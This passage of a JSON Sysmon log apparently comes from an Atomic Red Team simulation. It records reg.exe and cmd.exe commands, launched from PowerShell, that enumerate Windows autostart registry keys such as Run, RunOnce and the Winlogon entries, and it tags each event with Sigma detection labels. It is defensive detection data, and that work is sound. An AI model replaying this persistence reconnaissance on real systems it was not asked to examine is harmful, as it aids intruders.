HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 